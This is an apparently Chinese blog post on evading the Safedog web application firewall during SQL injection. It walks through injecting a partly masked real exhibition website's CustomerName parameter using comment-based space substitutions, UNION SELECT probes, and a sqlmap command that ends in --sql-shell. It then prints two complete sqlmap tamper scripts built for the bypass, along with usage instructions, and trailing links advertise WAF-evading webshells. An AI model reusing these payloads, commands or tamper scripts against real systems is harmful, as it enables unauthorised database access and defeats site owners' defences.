过狗脚本

最新推荐文章于 2023-10-18 21:57:29 发布
最新推荐文章于 2023-10-18 21:57:29 发布
阅读量1.1k 收藏
点赞数
分类专栏: 渗透学习

利用/*|%20--%20|*/代替空格

select 1,2,3/*%00*//*!50001from*/user


简要描述:

习惯了,随手一个',就有这个漏洞。。。
自定义sqlmap脚本,可sql-shell

详细说明:

中国国际广播电视信息网络展览会 主站:

code 区域 
http://**.**.**.**bn.tv/



介绍:http://**.**.**.**bn.tv/channels/4.html

漏洞url:

code 区域 
http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p

参数:CustomerName可注入



遇到狗:

code 区域 
http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27) and 1=user--



sql-1.png



绕过:

字段数:

code 区域 
http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27)/*/\*/order /*/\*/by/*/\*/71--



然后union

code 区域 
http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27)/*/\*/UNION/*/\*/ SELECT/*/\*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--



sql-2.png



提示类型不匹配。。。

然后全部替换为NULL,报错

code 区域 
输入字符串的格式不正确



code 区域 
http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27)/*/\*/UNION/*/\*/ SELECT/*/\*/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



sql-3.png



字段太多,需要去对应探测,但是有可能是多个NULL,所以直接用SQLMap去跑,需要自定sqlmap脚本

然后就有如下语句:

code 区域 
sqlmap.py --batch -u "http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p" -p CustomerName --prefix "%27)/*/\*/" --suffix "--" --tamper "tamper/space2myscript.py" --current-user --dbs --sql-shell



sql-4.png



仅做证明,未深入。。。

========================================================

space2myscript.py脚本:

code 区域 
#!/usr/bin/env python

"""

developers (goubuli)



"""

import random

import string



from lib.core.enums import PRIORITY



__priority__ = PRIORITY.LOW



def tamper(payload, **kwargs):

    

    retVal = ""



    if payload:

        for i in xrange(len(payload)):

            if payload[i].isspace():

                retVal += "/*/\*/" 

            elif payload[i] == '#' or payload[i:i + 3] == '-- ':

                retVal += payload[i:]

                break

            else:

                retVal += payload[i]



    return retVal




----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


i春秋最新过狗
   
   
价值1500过狗脚本。新官上任。送给你们.。这是sqlmap的tamper脚本
#!/usr/bin/env
 python

"""
write by 陆压 
2016.5.24
"""

from
 lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def
 dependencies():
    pass

def tamper(payload, **kwargs):
 
   """
    Replaces space character (' ') with plus ('/*|%20--%20|*/')

    >>> tamper('SELECT
 id FROM users')
    'SELECT/*|%20--%20|*/id/*|%20--%20|*/FROM/*|%20--%20|*/users'
        
 
   """

    retVal = payload

 
   if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

 
       for i in xrange(len(payload)):
            if not firstspace:
                if payload.isspace():
 
                   firstspace = True
                    retVal += "/*|%20--%20|*/"
                    continue

 
           elif payload == '\'':
                quote = not quote

            elif payload == '"':
                doublequote = not doublequote

            elif payload == " " and not doublequote and not quote:
                retVal += "/*|%20--%20|*/"
                continue

            retVal += payload

    return retVal








使用教程: sqlmap.py -u "url" --current-db(想看用户输 user 不多解释) --dbms=mysql(因为是mysql数据库,如果是access的 就输入 access。) --tamper “脚本名称(比如1.py)”
sqlmap tamper脚本编写
m0_56578216的博客
09-22 638
SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到绕过某些限制的目的。但是有些时候,SQLMap 自带的Tamper 脚本并不是特别好用,需要根据实际情况定制Tamper 脚本。sqlmap的编写语言也是python,tamper脚本能增强sqlmap的功能,达到绕过检测的目的。
SQL注入-过安全狗apache4.0
m0_60716947的博客
05-15 996
目录 一、安全狗的安装 二、Fuzz 三、过狗 (1)and 绕过 (2)order by 绕过 (3)union select 绕过 (4)database() 绕过 (5)获取其他库 (6)获得所有表 (7)获得所有字段 (8)获得数据 四、总结 一、安全狗的安装 这里有一篇很不错的文章,在安装的过程中出现的问题基本都能在里面找到解决方法 安全狗安装_YsterCcc的博客-优快云博客_安全狗安装 如果还是不行就找一个装了phpstudy老版本的靶机,比如我上次写.
sqlmap过狗脚本练习1
weixin_43727482的博客
05-27 479
本地搭建sql注入网站练习 测试安全狗,输入不合法参数被安全狗拦截: 使用sqlmap: 检测到防护机制,失败; 先手工尝试绕过安全狗: 将空格替换为 “/*//\*//\*\/c*/” 成功绕过安全狗; 写个sqlmap脚本: #demo.py def tamper(payload,**kwargs): retVal = payload quote=False if payload: retVal = '' fo.
最新棒SQLMAP 含过狗
07-06
当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。
sqlmap之绕过安全狗
qq_50854662的博客
01-05 6277
sqlmap之绕过安全狗
W3bsafe]SQLmap过狗命令的利用+教程
dfdhxb995397的博客
09-02 226
W3bsafe]SQLmap过狗命令的利用+教程 本文转自:i春秋社区 我就是那个爱装逼的小人 本屌又来装逼了SQLmap注入的时候 有的肯定会被安全狗拦截吧 本屌来教各位过狗!过waf等安全狗~~ sqlmap.py -u url -v 3 --batch --tamper "space2hash.py" --level 2 不要问我-v 3 -...
sh看门狗脚本
lys07962000的专栏
11-27 820
#!/bin/sh check_server()  {  server_name=$1; strStart="start  "; strSuccessed="  successed"; strFailed="   failed"; strIsRun=" is runing" IM_SERVER_DIR=/root/TeamTalk-master/IM-2.24/auto_setup/im_serv...
linux 版看门狗脚本日志功能
10-29
linux 版看门狗脚本日志功能,定时检测程序存活,重启程序。ubuntu下功能很强大。ubuntu下功能很强大。ubuntu下功能很强大。
Spring Boot调用 Shell 脚本实现看门狗功能
08-19
Spring Boot 调用 Shell 脚本实现看门狗功能 概述:本文主要介绍了使用 Spring Boot 调用 Shell 脚本实现看门狗功能的方法,通过实例代码详细地展示了实现过程,具有很高的参考价值。 一、什么是看门狗功能? ...
一键狗跳脚本VIP版本
07-21
在IT领域,"一键狗跳"通常指的是一个自动化脚本,它能够帮助用户快速、便捷地完成特定的任务或者跳过一些繁琐的操作步骤。这个“一键狗跳脚本VIP版本”显然是一个经过优化的高级版本,可能包含了更多功能或提升了...
sql注入过狗
weixin_43889136的博客
04-20 468
0x01前言 仅用作学习笔记,测试环境均为本地搭建。 0x02测试环境 Apache2.4+MySQL5.7 靶场:sqli-labs 安全狗4.0:安全狗这种基于正则的匹配还是比较好绕。 0x03绕过方法 绕过并不难,比如一些URL编码、大小写、16进制、内联注释、ASCII码、关键字替换等,这些基本方法大家都会,但是却绕不过。记住一句话:灵活组合有奇效!原理不写了。 1、and绕过 payload:?id=-1' and 1=1--+拦截 绕过payload: ?i.
PHP大马过狗代码.php
05-31
该文件为PHP代码的大马,通过该文件,可以很好的绕过安全狗的检测,进而链接服务器。相关链接为https://download.youkuaiyun.com/download/wychy2008/10318498
使用sqlmap绕过过滤
08-05
该文档讲解了如何使用sqlmap绕过过滤手段的方法,有兴趣的可以下载看看
sqlmap脚本
03-08
sqlmap绕过安全狗脚本 源自github sqlmap绕过安全狗脚本 来源自github
【Python脚本】SQLMap的Tamper脚本——绕过安全狗
最新发布
weixin_55205599的博客
10-18 784
针对WAF编写Tamper脚本进行绕过安装网站安全狗,此时再次尝试SQL注入时,安全狗会拦截。
sql注入100种姿势过waf(二):过安全狗
weixin_30455365的博客
06-06 1077
仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页 先去安全狗网站下载最新的安全狗版本 从官网下载 windwos apache版 v4.0.2395 最新版 数据库是mysql 5.6 1.首先判断是否有注入点包括是字符型还是数字型注入 我们假设他是数字型注入 构造 id=0=0 在数据库中执行 获取了全部数据 从返回的数据 我...
19.sqlmap饶过waf安全狗
weixin_46525626的博客
07-13 938
因为大都是通过的方式进行拦截,所以如果出现了被拦截的情况,大概率是因为你的语句的触发了黑名单的验证机制,导致被拦截,那应该怎么检测呢?其实就行了,输入页面,如下说明“and 1”这个部分触发了拦截,此时的绕过方式可以选择替换或者绕过,这里我们先试试对中间的空格进行替换,空格的替换方式尤其多,我们不可能全部都能记住,所以这里就要FUZZ绕过方式一:IP白奖单从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。
aspx包含文件过狗方法
如鹿渴慕泉水的专栏
11-05 3241
把同一个目录建一个xxxxaspx.aqg里面放代码就可以,可以是一个图片
sqlmap脚本绕安全狗
Hq_Dream的博客
01-05 4261
 脚本名:apostrophemask.py 作用:用utf8代替引号《Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'》 作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论 Example:   ("value' UNION ALL SELECT CONCAT(
ASP大马绕过安全狗的技巧分享
首先,"过狗asp大马"以及"过安全狗"这一描述很可能是关于绕过名为“安全狗”的Web应用防火墙(WAF)技术的讨论。安全狗是中国一款流行的网站安全防护软件,它主要用于防御SQL注入、跨站脚本攻击(XSS)、文件上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值